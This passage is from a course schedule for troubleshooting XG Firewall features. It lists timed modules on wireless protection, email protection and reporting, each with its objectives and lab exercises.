• Identify whether web server authentication issues are caused by the XG Firewall or the web server
• Labs (10 mins)
• Error Using Webmail Server

14:40-15:35 Module 8: Troubleshooting Wireless Protection

• Troubleshoot the access point deployment process
• Resolve common wireless network issues Resolve common wireless network issues
• Identify common causes of performance issues and the configuration that can help resolve them
• List the ports used by wireless protection and how to connect to the access point to gather additional informationLabs (Authenticate users over a site to site VPN)

15:35-15:50 Break 

15:50-17:20  Module 9 : Troubleshooting Email Protection

• Identify and resolve basic mail flow problems
• Troubleshoot virus emails that are not detected
• Troubleshoot false positive and false negative spam detections
• Identify the cause of, and resolve, missing quarantine digest issues
• Labs (30 mins)
• Cannot Receive Email
• Cannot Send Email
• Virus Email Delivered

17:20-18:00 Module 10: Troubleshooting Reporting and How to Get Help

• Troubleshoot issues with report generation
• Find help when you are unable to resolve issues yourself

Source: Datto